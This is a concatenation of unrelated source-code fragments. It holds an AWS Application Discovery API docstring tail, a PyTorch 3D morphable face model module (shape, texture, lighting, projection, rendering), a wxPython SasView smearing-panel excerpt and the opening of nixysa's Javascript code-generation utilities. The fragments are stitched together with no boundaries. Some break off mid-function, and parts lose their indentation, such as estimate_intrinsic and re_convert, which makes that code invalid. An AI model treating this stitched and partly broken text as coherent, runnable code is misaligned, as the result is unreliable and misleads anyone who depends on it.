values (list) -- [REQUIRED]A string value on which to filter. For example, if you choose the destinationServer.osVersion filter name, you could specify Ubuntu for the value.
(string) --
condition (string) -- [REQUIRED]A conditional operator. The following operators are valid: EQUALS, NOT_EQUALS, CONTAINS, NOT_CONTAINS. If you specify multiple filters, the system utilizes all filters as though concatenated by AND . If you specify multiple values for a particular filter, the system differentiates the values using OR . Calling either DescribeConfigurations or ListConfigurations returns attributes of matching configuration items.
:type maxResults: integer
:param maxResults: The total number of items to return. The maximum value is 100.
:type nextToken: string
:param nextToken: Token to retrieve the next set of results. For example, if a previous call to ListConfigurations returned 100 items, but you set ListConfigurationsRequest$maxResults to 10, you received a set of 10 results along with a token. Use that token in this query to get the next set of 10.
:type orderBy: list
:param orderBy: Certain filter criteria return output that can be sorted in ascending or descending order. For a list of output characteristics for each filter, see Using the ListConfigurations Action .
(dict) --A field and direction for ordered output.
fieldName (string) -- [REQUIRED]The field on which to order.
sortOrder (string) --Ordering direction.
:rtype: dict
:return: {
'configurations': [
{
'string': 'string'
},
],
'nextToken': 'string'
}
| |
<gh_stars>100-1000
import torch
import math
import numpy as np
from utils import LeastSquares
def split_coeff(coeff):
    """Split a packed [n, 257] 3DMM coefficient tensor into its parts.

    Column layout: identity [0:80], expression [80:144], texture/albedo
    [144:224], Euler angles [224:227], SH lighting gamma [227:254],
    translation [254:].

    Returns:
        (id_coeff, ex_coeff, tex_coeff, angles, gamma, translation)
    """
    # Consecutive column boundaries of the packed vector; the final slice is
    # open-ended, exactly like the original `coeff[:, 254:]`.
    boundaries = (0, 80, 144, 224, 227, 254, None)
    pieces = [coeff[:, lo:hi] for lo, hi in zip(boundaries[:-1], boundaries[1:])]
    return tuple(pieces)
class _need_const:
    # Normalization constants for the 9-band spherical-harmonics (SH)
    # lighting basis; unpacked from illu_consts inside illumination_layer.
    a0 = np.pi
    a1 = 2 * np.pi / np.sqrt(3.0)
    a2 = 2 * np.pi / np.sqrt(8.0)
    c0 = 1 / np.sqrt(4 * np.pi)
    c1 = np.sqrt(3.0) / np.sqrt(4 * np.pi)
    c2 = 3 * np.sqrt(5.0) / np.sqrt(12 * np.pi)
    d0 = 0.5 / np.sqrt(3.0)
    # Bundled for one-shot unpacking: a0, a1, a2, c0, c1, c2, d0.
    illu_consts = [a0, a1, a2, c0, c1, c2, d0]

    # Image sizes in pixels; presumably the raw image size vs. the network
    # crop size used by the alignment pipeline — TODO confirm with callers.
    origin_size = 300
    target_size = 224
    # Camera distance along +z; matches the hard-coded cam_pos = 10 in
    # projection_layer.
    camera_pos = 10.0
def shape_formation(id_coeff, ex_coeff, facemodel):
    """Build per-vertex face geometry from identity/expression coefficients.

    Implements S = mean_shape + alpha * B_id + beta * B_exp (BFM model),
    then re-centers so the mean shape's centroid sits at the origin.

    Args:
        id_coeff: [n, 80] identity (shape) coefficients.
        ex_coeff: [n, 64] expression coefficients.
        facemodel: model exposing `idBase` [3N, 80], `exBase` [3N, 64] and
            `meanshape` [3N].

    Returns:
        [n, N, 3] tensor of vertex positions.
    """
    batch = id_coeff.size(0)
    identity_part = torch.einsum('ij,aj->ai', facemodel.idBase, id_coeff)
    expression_part = torch.einsum('ij,aj->ai', facemodel.exBase, ex_coeff)
    flat = identity_part + expression_part + facemodel.meanshape
    verts = flat.view(batch, -1, 3)
    # Re-center on the mean shape's centroid (not the per-sample centroid).
    centroid = facemodel.meanshape.view(1, -1, 3).mean(dim=1, keepdim=True)
    return verts - centroid
def texture_formation(tex_coeff, facemodel):
    """Compute per-vertex albedo: T = mean_texture + gamma * B_texture.

    Args:
        tex_coeff: [n, 80] texture (albedo) coefficients.
        facemodel: model exposing `texBase` [3N, 80] and `meantex` [3N].

    Returns:
        [n, N, 3] tensor of vertex colors, RGB order, range 0-255.
    """
    batch = tex_coeff.size(0)
    albedo = torch.einsum('ij,aj->ai', facemodel.texBase, tex_coeff)
    albedo = (albedo + facemodel.meantex).view(batch, -1, 3)
    return albedo
def compute_norm(face_shape, facemodel):
    """Per-vertex normals from the one-ring neighborhood (up to 8 faces).

    Unit face normals are summed over each vertex's adjacent faces and then
    renormalized (not area-weighted, since face normals are normalized first).
    See https://fredriksalomonsson.files.wordpress.com/2010/10/mesh-data-structuresv2.pdf

    Args:
        face_shape: [n, N, 3] vertex positions.
        facemodel: exposes `tri` [F, 3] (1-based vertex indices per triangle)
            and `point_buf` [N, 8] (1-based face indices per vertex; padding
            entries point at the appended zero row).

    Returns:
        [n, N, 3] unit vertex normals.
    """
    tri = facemodel.tri - 1          # 0-based triangle vertex indices
    adj = facemodel.point_buf - 1    # 0-based adjacent-face indices per vertex
    a = face_shape[:, tri[:, 0], :]
    b = face_shape[:, tri[:, 1], :]
    c = face_shape[:, tri[:, 2], :]
    face_normals = (a - b).cross(b - c)
    face_normals = torch.nn.functional.normalize(face_normals, p=2, dim=2)
    # Append a zero normal so padded adjacency entries contribute nothing.
    pad = torch.zeros_like(face_normals[:, :1, :])
    face_normals = torch.cat((face_normals, pad), 1)
    vertex_normals = face_normals[:, adj, :].sum(dim=2)
    return torch.nn.functional.normalize(vertex_normals, p=2, dim=2)
def compute_rotation_matrix(angles):
    """Build per-batch rotation matrices from three Euler angles.

    R = Rz @ Ry @ Rx, returned TRANSPOSED so callers can right-multiply a
    row-major [N, 3] shape: rotated = face_shape @ result.
    (ref: https://www.cnblogs.com/larry-xia/p/11926121.html)

    Args:
        angles: [n, 3] tensor of (x, y, z) Euler angles in radians.

    Returns:
        [n, 3, 3] transposed rotation matrices.
    """
    n_b = angles.size(0)
    device = angles.device
    cx, cy, cz = (torch.cos(angles[:, i]) for i in range(3))
    sx, sy, sz = (torch.sin(angles[:, i]) for i in range(3))
    one = torch.ones(n_b).to(device)
    zero = torch.zeros(n_b).to(device)
    # Row-major 3x3 entries, stacked along dim 1 then reshaped.
    rot_x = torch.stack(
        [one, zero, zero,
         zero, cx, -sx,
         zero, sx, cx], dim=1).view(n_b, 3, 3)
    rot_y = torch.stack(
        [cy, zero, sy,
         zero, one, zero,
         -sy, zero, cy], dim=1).view(n_b, 3, 3)
    rot_z = torch.stack(
        [cz, -sz, zero,
         sz, cz, zero,
         zero, zero, one], dim=1).view(n_b, 3, 3)
    rotation = rot_z.bmm(rot_y).bmm(rot_x)
    # Transpose so rotated shapes can be computed as face_shape @ R.
    return rotation.permute(0, 2, 1)
def projection_layer(face_shape, fx=1015.0, fy=1015.0, px=112.0, py=112.0):
    """Project 3D camera-space face vertices onto the image plane.

    Focal length and camera position are chosen empirically. The camera sits
    at z = 10 (matches _need_const.camera_pos); depth is flipped to
    cam_pos - z before applying the pinhole intrinsics.

    Args:
        face_shape: [n, N, 3] vertex positions. NOT modified — the previous
            version clobbered the caller's tensor in place via
            `face_shape[:, :, 2] = cam_pos - face_shape[:, :, 2]`.
        fx, fy: focal lengths in pixels.
        px, py: principal point in pixels.

    Returns:
        (face_projection [n, N, 2], z_buffer [n, N, 1]) — z_buffer holds the
        original (unflipped) vertex depth.
    """
    cam_pos = 10
    # Pinhole intrinsics [[fx, 0, px], [0, fy, py], [0, 0, 1]].
    p_matrix = np.array([[fx, 0.0, px],
                         [0.0, fy, py],
                         [0.0, 0.0, 1.0]], dtype=np.float32).reshape(1, 3, 3)
    p_matrix = torch.from_numpy(p_matrix)
    n_b = face_shape.size(0)
    if face_shape.is_cuda:
        p_matrix = p_matrix.cuda()
    p_matrix = p_matrix.expand(n_b, 3, 3)
    # Bug fix: operate on a copy instead of mutating the input in place.
    face_shape = face_shape.clone()
    face_shape[:, :, 2] = cam_pos - face_shape[:, :, 2]
    aug_projection = face_shape.bmm(p_matrix.permute(0, 2, 1))
    face_projection = aug_projection[:, :, 0:2] / aug_projection[:, :, 2:]
    z_buffer = cam_pos - aug_projection[:, :, 2:]
    return face_projection, z_buffer
def illumination_layer(face_texture, norm, gamma):
    """Shade per-vertex albedo with a 9-band spherical-harmonics light model.

    Args:
        face_texture: [n, N, 3] per-vertex albedo (RGB, 0-255).
        norm: [n, N, 3] unit vertex normals.
        gamma: [n, 27] SH lighting coefficients (9 per color channel).

    Returns:
        (face_color [n, N, 3], lighting [n, N, 3]) where lighting is the
        SH irradiance (color under uniform texture) and face_color is the
        albedo modulated by it.
    """
    n_b, num_vertex, _ = face_texture.size()
    sh_coeff = gamma.view(-1, 3, 9).clone()
    sh_coeff[:, :, 0] += 0.8  # ambient offset baked into the DC term
    sh_coeff = sh_coeff.permute(0, 2, 1)  # -> [n, 9, 3]
    a0, a1, a2, c0, c1, c2, d0 = _need_const.illu_consts
    flat_norm = norm.view(-1, 3)
    nx, ny, nz = flat_norm[:, 0], flat_norm[:, 1], flat_norm[:, 2]
    dc = torch.ones(n_b * num_vertex).float() * (a0 * c0)
    if gamma.is_cuda:
        dc = dc.cuda()
    # The nine real SH basis functions evaluated at each normal.
    basis = torch.stack(
        [
            dc,
            -a1 * c1 * ny,
            a1 * c1 * nz,
            -a1 * c1 * nx,
            a2 * c2 * nx * ny,
            -a2 * c2 * ny * nz,
            a2 * c2 * d0 * (3 * nz.pow(2) - 1),
            -a2 * c2 * nx * nz,
            a2 * c2 * 0.5 * (nx.pow(2) - ny.pow(2)),
        ],
        dim=1,
    ).view(n_b, num_vertex, 9)
    lighting = basis.bmm(sh_coeff)  # [n, N, 9] @ [n, 9, 3] -> [n, N, 3]
    face_color = face_texture * lighting
    return face_color, lighting
def rigid_transform(face_shape, rotation, translation):
    """Apply a rigid motion: shape @ R plus translation (R is pre-transposed
    by compute_rotation_matrix, hence the right-multiplication)."""
    batch = face_shape.shape[0]
    rotated = face_shape.bmm(rotation)
    return rotated + translation.view(batch, 1, 3)
def compute_landmarks(face_shape, facemodel):
    """Select the 3D landmark vertices; facemodel.keypoints is 1-based."""
    idx = facemodel.keypoints - 1
    return face_shape[:, idx, :]
def compute_3d_landmarks(face_shape, facemodel, angles, translation):
    """Rigidly pose the face, then pick out the landmark vertices."""
    posed = rigid_transform(face_shape, compute_rotation_matrix(angles),
                            translation)
    return compute_landmarks(posed, facemodel)
def transform_face_shape(face_shape, angles, translation):
    """Apply the rotation derived from `angles` plus `translation`."""
    return rigid_transform(face_shape, compute_rotation_matrix(angles),
                           translation)
def render_img(face_shape, face_color, facemodel, image_size=224, fx=1015.0, fy=1015.0, px=112.0, py=112.0, device='cuda:0'):
    '''
    ref: https://github.com/facebookresearch/pytorch3d/issues/184
    The rendering function (just for test)

    Input:
        face_shape:  Tensor[1, 35709, 3]
        face_color: Tensor[1, 35709, 3] in [0, 1]
        facemodel: contains `tri` (triangles[70789, 3], index start from 1)

    Returns:
        Rendered images as a tensor, clamped to [0, 1].
    '''
    # pytorch3d is a heavyweight optional dependency; imported lazily so the
    # rest of this module can be used without it.
    from pytorch3d.structures import Meshes
    from pytorch3d.renderer.mesh.textures import TexturesVertex
    from pytorch3d.renderer import (
        PerspectiveCameras,
        PointLights,
        RasterizationSettings,
        MeshRenderer,
        MeshRasterizer,
        SoftPhongShader,
        BlendParams
    )
    face_color = TexturesVertex(verts_features=face_color.to(device))
    face_buf = torch.from_numpy(facemodel.tri - 1)  # index start from 1
    face_idx = face_buf.unsqueeze(0)
    mesh = Meshes(face_shape.to(device), face_idx.to(device), face_color)
    R = torch.eye(3).view(1, 3, 3).to(device)
    # NOTE(review): flips the camera x-axis — presumably to reconcile the
    # model's coordinate convention with pytorch3d's; confirm against the
    # referenced GitHub issue.
    R[0, 0, 0] *= -1.0
    T = torch.zeros([1, 3]).to(device)
    # Convert pixel intrinsics to pytorch3d's normalized (NDC) convention.
    half_size = (image_size - 1.0) / 2
    focal_length = torch.tensor([fx / half_size, fy / half_size], dtype=torch.float32).reshape(1, 2).to(device)
    principal_point = torch.tensor([(half_size - px) / half_size, (py - half_size) / half_size], dtype=torch.float32).reshape(1, 2).to(device)
    cameras = PerspectiveCameras(
        device=device,
        R=R,
        T=T,
        focal_length=focal_length,
        principal_point=principal_point
    )
    raster_settings = RasterizationSettings(
        image_size=image_size,
        blur_radius=0.0,
        faces_per_pixel=1
    )
    # Pure ambient light (diffuse/specular zeroed): shading comes entirely
    # from the precomputed vertex colors.
    lights = PointLights(
        device=device,
        ambient_color=((1.0, 1.0, 1.0),),
        diffuse_color=((0.0, 0.0, 0.0),),
        specular_color=((0.0, 0.0, 0.0),),
        location=((0.0, 0.0, 1e5),)
    )
    blend_params = BlendParams(background_color=(0.0, 0.0, 0.0))
    renderer = MeshRenderer(
        rasterizer=MeshRasterizer(
            cameras=cameras,
            raster_settings=raster_settings
        ),
        shader=SoftPhongShader(
            device=device,
            cameras=cameras,
            lights=lights,
            blend_params=blend_params
        )
    )
    images = renderer(mesh)
    images = torch.clamp(images, 0.0, 1.0)
    return images
def estimate_intrinsic(landmarks_2d, transform_params, z_buffer, face_shape, facemodel, angles, translation):
# estimate intrinsic parameters
def re_convert(landmarks_2d, trans_params, origin_size=_need_const.origin_size, target_size=_need_const.target_size):
# convert landmarks to un_cropped images
w = (origin_size * trans_params[2]).astype(np.int32)
h = (origin_size * trans_params[2]).astype(np.int32)
landmarks_2d[:, :, 1] = target_size - 1 - landmarks_2d[:, :, 1]
landmarks_2d[:, :, 0] = landmarks_2d[:, :, 0] + w / 2 - target_size / 2
landmarks_2d[:, :, 1] = landmarks_2d[:, :, 1] + h / 2 - target_size / 2
landmarks_2d = landmarks_2d / trans_params[2]
landmarks_2d[:, :, 0] = landmarks_2d[:, :, 0] + trans_params[3] - origin_size / 2
| |
chi2
chi2 = format_number(chisqr, True)
self.tcChi.SetValue(chi2)
self.tcChi.Refresh()
else:
self.tcChi.SetValue("-")
# Hide error title
if self.text2_3.IsShown() and not self.is_mac:
self.text2_3.Hide()
try:
if self.enable_disp.GetValue():
if hasattr(self, "text_disp_1"):
if self.text_disp_1 is not None and not self.is_mac:
self.text_disp_1.Hide()
except:
dispersity = None
pass
i = 0
# Set the panel when fit result are list
for item in self.param_toFit:
if len(item) > 5 and item is not None:
if item[0].IsShown():
# reset error value to initial state
if not self.is_mac:
item[3].Hide()
item[4].Hide()
for ind in range(len(out)):
if item[1] == p_name[ind]:
break
if len(out) > 0 and out[ind] is not None:
val_out = format_number(out[ind], True)
item[2].SetValue(val_out)
if(cov is not None and len(cov) == len(out)):
try:
if dispersity is not None:
if self.enable_disp.GetValue():
if hasattr(self, "text_disp_1"):
if self.text_disp_1 is not None:
if not self.text_disp_1.IsShown()\
and not self.is_mac:
self.text_disp_1.Show(True)
except:
pass
if cov[ind] is not None:
if np.isfinite(float(cov[ind])):
val_err = format_number(cov[ind], True)
item[4].SetForegroundColour(wx.BLACK)
else:
val_err = 'NaN'
item[4].SetForegroundColour(wx.RED)
if not self.is_mac:
item[3].Show(True)
item[4].Show(True)
item[4].SetValue(val_err)
has_error = True
i += 1
else:
raise ValueError("onsetValues: Invalid parameters...")
# Show error title when any errors displayed
if has_error:
if not self.text2_3.IsShown():
self.text2_3.Show(True)
# save current state
self.save_current_state()
if not self.is_mac:
self.Layout()
self.Refresh()
# plot model ( when drawing, do not update chisqr value again)
self._draw_model(update_chisqr=False, source='fit')
def onWeighting(self, event):
    """
    On Weighting radio button event: record the selected button's label and
    push the corresponding weight into the fit problem.
    """
    button = event.GetEventObject()
    self.weightbt_string = button.GetLabelText()
    self._set_weight()
def _set_weight(self, is_2D=None):
    """
    Set the weight in the fit problem for the current data.

    :param is_2D: explicit dimensionality flag; derived from the data
        when None.
    """
    flag = self.get_weight_flag()
    dimension_flag = self._is_2D() if is_2D is None else is_2D
    self._manager.set_fit_weight(uid=self.uid,
                                 flag=flag,
                                 is2d=dimension_flag,
                                 fid=None)
def onPinholeSmear(self, event):
    """
    Create a custom pinhole smear object that will change the way residuals
    are computed when fitting

    :Note: accuracy is given by strings 'High', 'Med', 'Low' for 2D,
        None for 1D
    """
    # Need update param values
    self._update_paramv_on_fit()
    if event is not None:
        tcrtl = event.GetEventObject()
        # event case of radio button
        if tcrtl.GetValue():
            # Radio button just selected: start from a clean 0% dQ/Q.
            self.dx_percent = 0.0
            is_new_pinhole = True
        else:
            is_new_pinhole = self._is_changed_pinhole()
    else:
        # No event: called programmatically, always rebuild the smearer.
        is_new_pinhole = True
    # if any value is changed
    if is_new_pinhole:
        self._set_pinhole_smear()
    # hide all slit sizers
    self._hide_all_smear_info()
    # show relevant slit sizers
    self._show_smear_sizer()
    self.sizer_set_smearer.Layout()
    # we need FitInside here not just self.Layout to ensure all the sizers
    # end up with the necessasary space to in the scroll panel. In
    # particular the compute and fit buttons end up on top of each other
    # PDB Nov 28 2015.
    self.FitInside()
    if event is not None:
        event.Skip()
    # self._undo.Enable(True)
    self.save_current_state()
    event = PageInfoEvent(page=self)
    wx.PostEvent(self.parent, event)
def _is_changed_pinhole(self):
    """
    Check whether the pinhole smear percentage in the text control differs
    from the stored value.

    :return: True when the entry changed or cannot be parsed, else False
    """
    raw = self.smear_pinhole_percent.GetValue()
    try:
        entered = float(raw)
    except Exception:
        # Unparsable input counts as a change so it gets re-validated.
        return True
    return self.dx_percent != entered
def _set_pinhole_smear(self):
    """
    Set custom pinhole smear

    :return: msg — an error message string, or None on success
    """
    # copy data so the stored dataset is not clobbered by the dq columns
    data = copy.deepcopy(self.data)
    if self._is_2D():
        self.smear_type = 'Pinhole2d'
        len_data = len(data.data)
        data.dqx_data = np.zeros(len_data)
        data.dqy_data = np.zeros(len_data)
    else:
        self.smear_type = 'Pinhole'
        len_data = len(data.x)
        data.dx = np.zeros(len_data)
        data.dxl = None
        data.dxw = None
    msg = None
    get_pin_percent = self.smear_pinhole_percent
    if not check_float(get_pin_percent):
        get_pin_percent.SetBackgroundColour("pink")
        msg = "Model Error:wrong value entered!!!"
    else:
        if len_data < 2:
            len_data = 2
        self.dx_percent = float(get_pin_percent.GetValue())
        if self.dx_percent < 0:
            get_pin_percent.SetBackgroundColour("pink")
            msg = "Model Error:This value can not be negative!!!"
        elif self.dx_percent is not None:
            # dQ/Q entered as a percentage; convert to a fraction of Q.
            percent = self.dx_percent/100
            if self._is_2D():
                q = np.sqrt(data.qx_data**2 + data.qy_data**2)
                data.dqx_data = data.dqy_data = percent*q
            else:
                data.dx = percent * data.x
        self.current_smearer = smear_selection(data, self.model)
        # 2D need to set accuracy
        if self._is_2D():
            self.current_smearer.set_accuracy(
                accuracy=self.smear2d_accuracy)
    if msg is not None:
        wx.PostEvent(self._manager.parent, StatusEvent(status=msg))
    else:
        get_pin_percent.SetBackgroundColour("white")
    # set smearing value whether or not the data contain the smearing info
    enable_smearer = not self.disable_smearer.GetValue()
    self._manager.set_smearer(smearer=self.current_smearer,
                              fid=self.data.id,
                              qmin=float(self.qmin_x),
                              qmax=float(self.qmax_x),
                              enable_smearer=enable_smearer,
                              uid=self.uid)
    return msg
def update_pinhole_smear(self):
    """
    Called by kill_focus on the pinhole TextCtrl to apply any edits.

    :return: False when a wrong value was entered, True otherwise
    """
    # Nothing changed: nothing to validate or rebuild.
    if not self._is_changed_pinhole():
        return True
    msg = self._set_pinhole_smear()
    wx.CallAfter(self.save_current_state)
    return msg is None
def onSlitSmear(self, event):
    """
    Create a custom slit smear object that will change the way residuals
    are computed when fitting
    """
    # Need update param values
    self._update_paramv_on_fit()
    # msg default
    msg = None
    # for event given
    if event is not None:
        tcrtl = event.GetEventObject()
        # event case of radio button
        if tcrtl.GetValue():
            # Radio button just selected: reset both slit dimensions.
            self.dxl = 0.0
            self.dxw = 0.0
            is_new_slit = True
        else:
            is_new_slit = self._is_changed_slit()
    else:
        # No event: called programmatically, always rebuild the smearer.
        is_new_slit = True
    # if any value is changed
    if is_new_slit:
        msg = self._set_slit_smear()
    # hide all slit sizers
    self._hide_all_smear_info()
    # show relevant slit sizers
    self._show_smear_sizer()
    self.sizer_set_smearer.Layout()
    # we need FitInside here not just self.Layout to ensure all the sizers
    # end up with the necessasary space to in the scroll panel. In
    # particular the compute and fit buttons end up on top of each other
    # PDB Nov 28 2015.
    self.FitInside()
    if event is not None:
        event.Skip()
    self.save_current_state()
    event = PageInfoEvent(page=self)
    wx.PostEvent(self.parent, event)
    if msg is not None:
        wx.PostEvent(self._manager.parent, StatusEvent(status=msg))
def _is_changed_slit(self):
    """
    Check whether either slit length entry differs from the stored values.

    :return: True when an entry changed or cannot be parsed, else False
    """
    width = self.smear_slit_width.GetValue()
    height = self.smear_slit_height.GetValue()
    # A blank box is valid (means zero), so clear any leftover pink
    # background from a previous bad entry — _set_slit_smear() does not
    # handle this case.
    if height.strip() == "":
        self.smear_slit_height.SetBackgroundColour(wx.WHITE)
    if width.strip() == "":
        self.smear_slit_width.SetBackgroundColour(wx.WHITE)

    def parse(text):
        # Empty means zero; unparsable means None ("treat as changed").
        if text == "":
            return 0.0
        try:
            return float(text)
        except Exception:
            return None

    new_width = parse(width)
    if new_width is None or self.dxw != new_width:
        return True
    new_height = parse(height)
    if new_height is None or self.dxl != new_height:
        return True
    return False
def _set_slit_smear(self):
    """
    Set custom slit smear

    :return: message to inform the user about the validity
        of the values entered for slit smear (None on success)
    """
    if isinstance(self.data, Data2D) or self.enable2D:
        # Slit smearing only applies to 1D data.
        return
    # make sure once more if it is smearer
    data = copy.deepcopy(self.data)
    data_len = len(data.x)
    data.dx = None
    data.dxl = None
    data.dxw = None
    msg = None
    try:
        self.dxl = float(self.smear_slit_height.GetValue())
        data.dxl = self.dxl * np.ones(data_len)
        self.smear_slit_height.SetBackgroundColour(wx.WHITE)
    except:
        # Parse failure: fall back to zero height, flag only a non-blank
        # entry as an error (blank legitimately means zero).
        self.dxl = None
        data.dxl = np.zeros(data_len)
        if self.smear_slit_height.GetValue().lstrip().rstrip() != "":
            self.smear_slit_height.SetBackgroundColour("pink")
            msg = "Wrong value entered... "
        else:
            self.smear_slit_height.SetBackgroundColour(wx.WHITE)
    try:
        self.dxw = float(self.smear_slit_width.GetValue())
        self.smear_slit_width.SetBackgroundColour(wx.WHITE)
        data.dxw = self.dxw * np.ones(data_len)
    except:
        # Same fallback for the slit width.
        self.dxw = None
        data.dxw = np.zeros(data_len)
        if self.smear_slit_width.GetValue().lstrip().rstrip() != "":
            self.smear_slit_width.SetBackgroundColour("pink")
            msg = "Wrong Fit value entered... "
        else:
            self.smear_slit_width.SetBackgroundColour(wx.WHITE)
    self.current_smearer = smear_selection(data, self.model)
    # set smearing value whether or not the data contain the smearing info
    enable_smearer = not self.disable_smearer.GetValue()
    self._manager.set_smearer(smearer=self.current_smearer,
                              fid=self.data.id,
                              qmin=float(self.qmin_x),
                              qmax=float(self.qmax_x),
                              enable_smearer=enable_smearer,
                              uid=self.uid)
    return msg
def update_slit_smear(self):
    """
    Called by kill_focus on the slit TextCtrls to apply any edits.

    :return: False when a wrong value was entered, True otherwise
    """
    # Nothing changed: nothing to validate or rebuild.
    if not self._is_changed_slit():
        return True
    msg = self._set_slit_smear()
    # self._undo.Enable(True)
    self.save_current_state()
    return msg is None
def onSmear(self, event):
    """
    Create a smear object that will change the way residuals
    are computed when fitting
    """
    if event is not None:
        event.Skip()
    if self.data is None:
        return
    # Need update param values
    self._update_paramv_on_fit()
    if self.model is not None:
        if self.data.is_data:
            self._manager.page_finder[self.uid].add_data(data=self.data)
    temp_smearer = self.on_smear_helper()
    self.sizer_set_smearer.Layout()
    # we need FitInside here not just self.Layout to ensure all the sizers
    # end up with the necessasary space to in the scroll panel. In
    # particular the compute and fit buttons end up on top of each other
    # PDB Nov 28 2015.
    self.FitInside()
    self._set_weight()
    # set smearing value whether or not the data contain the smearing info
    enable_smearer = not self.disable_smearer.GetValue()
    wx.CallAfter(self._manager.set_smearer, uid=self.uid,
                 smearer=temp_smearer,
                 fid=self.data.id,
                 qmin=float(self.qmin_x),
                 qmax=float(self.qmax_x),
                 enable_smearer=enable_smearer)
    # Mirror the radio-button states into the saved page state.
    self.state.enable_smearer = self.enable_smearer.GetValue()
    self.state.disable_smearer = self.disable_smearer.GetValue()
    self.state.pinhole_smearer = self.pinhole_smearer.GetValue()
    self.state.slit_smearer = self.slit_smearer.GetValue()
def on_smear_helper(self, update=False):
"""
Help for onSmear
:param update: | |
<filename>nixysa/js_utils.py
#!/usr/bin/python2.4
#
# Copyright 2008 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for Javascript code generation.
This module contains a few utilities for Javascript code generation.
"""
import re
import sys
import naming
import gflags
import log
import cpp_utils
import writer
# Matches a doxygen-style tag (e.g. '\param', '\return') at the start of a
# comment line; group 1 is the tag name.
_doxygen_tag_re = re.compile(r'\s*\\(\w+) ')
# Matches '\param name description'; group 1 is the parameter name and
# group 2 the first line of its description.
_param_re = re.compile(r'\s*\\param (\w+) (.*?)$')
# Matches any character that is not valid in an upper-case identifier.
_non_id_re = re.compile(r'[^A-Z0-9_]')
def GetScopePrefix(scope, type_defn, scope_operator='.'):
    """Gets the prefix string to reference a type from a given scope.

    This function returns a concatenation of js scope operators such as, in
    the context of the given scope, when prefixing the name of the given
    type, it will reference exactly that type. E.g. to access a type B.C
    from a sibling scope D, this returns 'B.'.

    Args:
        scope: the Definition for the scope from which the type must be
            accessed.
        type_defn: the Definition for the type which must be accessed.
        scope_operator: the scope operator; defaults to '.' (Javascript).

    Returns:
        the prefix string.
    """
    # Bug fix: scope_operator previously had no default value, so the
    # two-argument call in GetScopedName raised TypeError; it was also
    # silently ignored in favor of a hard-coded '.'. Default it to '.'
    # and honor the argument as documented.
    return cpp_utils.GetScopePrefixWithScopeOperator(scope, type_defn,
                                                     scope_operator)
def GetScopedName(scope, type_defn):
    """Gets the string to reference a type from a given scope.

    This returns the scope prefix (see GetScopePrefix) concatenated with the
    type's own name, so that from the given scope the result references
    exactly that type (e.g. 'B.C').

    Args:
        scope: the Definition for the scope from which the type must be
            accessed.
        type_defn: the Definition for the type which must be accessed.

    Returns:
        the scoped reference string.
    """
    # Bug fix: GetScopePrefix requires a scope operator argument; the
    # original two-argument call raised TypeError. Javascript uses '.'.
    return GetScopePrefix(scope, type_defn, '.') + type_defn.name
def GetFullyQualifiedScopePrefix(scope):
    """Gets the fully qualified scope prefix.

    Args:
        scope: the Definition for the scope from which the type must be
            accessed.

    Returns:
        the fully qualified scope prefix string, ending in '.'; the root
        scope (first stack entry) is omitted.
    """
    stack = scope.GetParentScopeStack() + [scope]
    names = [entry.name for entry in stack[1:]]
    return '.'.join(names + [''])
def GetFullyQualifiedTypeName(type_defn):
    """Gets the fully qualified (JSDoc) name for a type.

    Args:
        type_defn: the type definition you want a name for.

    Returns:
        the fully qualified name string, as produced by the type's binding
        model.
    """
    model = type_defn.binding_model
    return model.JSDocTypeString(type_defn)
def GetFullyQualifiedTypeString(type_defn):
    """Gets the fully qualified dotted path of a type's final definition.

    Args:
        type_defn: the type definition.

    Returns:
        the '.'-joined names of every enclosing scope (root omitted)
        followed by the final type's own name.
    """
    final = type_defn.GetFinalType()
    path = [s.name for s in final.GetParentScopeStack()[1:]]
    path.append(final.name)
    return '.'.join(path)
def GetGetterName(field):
    """Gets the name of the getter function for a member field.

    Unless overridden by the 'getter' attribute in IDL, the default name for
    the getter function is the name of the field, normalized to the
    lower-case convention.

    Args:
        field: the Definition for the field.

    Returns:
        the name of the getter function.
    """
    override = field.attributes['getter']
    if override:
        return override
    return naming.Normalize(field.name, naming.Lower)
def GetSetterName(field):
    """Gets the name of the setter function for a member field.

    Unless overridden by the 'setter' attribute in IDL, the default name for
    the setter function is 'set_' concatenated with the name of the field,
    normalized to the lower-case convention.

    Args:
        field: the Definition for the field.

    Returns:
        the name of the setter function.
    """
    override = field.attributes['setter']
    if override:
        return override
    return 'set_%s' % naming.Normalize(field.name, naming.Lower)
def GetFunctionParamPrototype(scope, param):
    """Gets the string needed to declare a parameter in a function prototype.

    Args:
        scope: the scope of the prototype (unused for Javascript; kept so the
            signature matches the other language generators).
        param: the Function.Param to declare.

    Returns:
        a (string, list) pair. The string is the Javascript name of the
        parameter as it appears in the prototype. The list contains a single
        (name, Definition) pair describing the parameter's type.
    """
    # NOTE(review): the original also computed the C++ parameter string via
    # param.type_defn.binding_model and discarded the result; that dead call
    # has been removed — Javascript prototypes only need the normalized name.
    name = naming.Normalize(param.name, naming.Java)
    return name, [(name, param.type_defn)]
def GetFunctionPrototype(scope, obj, member):
    """Gets the string needed to declare a function prototype.

    Args:
        scope: the scope of the prototype.
        obj: the function to declare.
        member: True if member function.

    Returns:
        A string prototype of the form 'Scope.[prototype.]name =
        function(params) { };'.
    """
    scope_prefix = GetFullyQualifiedScopePrefix(scope)
    member_prefix = 'prototype.' if member else ''
    params = ', '.join(
        GetFunctionParamPrototype(scope, p)[0] for p in obj.params)
    return '%s%s%s = function(%s) { };' % (
        scope_prefix, member_prefix,
        naming.Normalize(obj.name, naming.Java), params)
def GetFunctionParamType(obj, param_name):
    """Gets the type of a function param.

    Args:
        obj: The function.
        param_name: The name of the parameter. A single trailing '?'
            (optional-parameter marker) is stripped before matching.

    Returns:
        A string which is the type of the parameter; '*' (with an error
        logged) when no parameter of that name exists.
    """
    if param_name[-1] == '?':
        param_name = param_name[:-1]
    for candidate in obj.params:
        if candidate.name == param_name:
            return GetFullyQualifiedTypeName(candidate.type_defn)
    log.SourceError(obj.source, 'No param "%s" on function "%s"' %
                    (param_name, obj.name))
    return '*'
def GetCommentsForParams(func):
    """Gets the comments for the params of a function.

    Parses the function's '__docs' attribute line by line, pulling '@param'
    doxygen tags (plus their continuation lines) out of the general comment
    text.

    Args:
        func: The function whose docs are parsed.
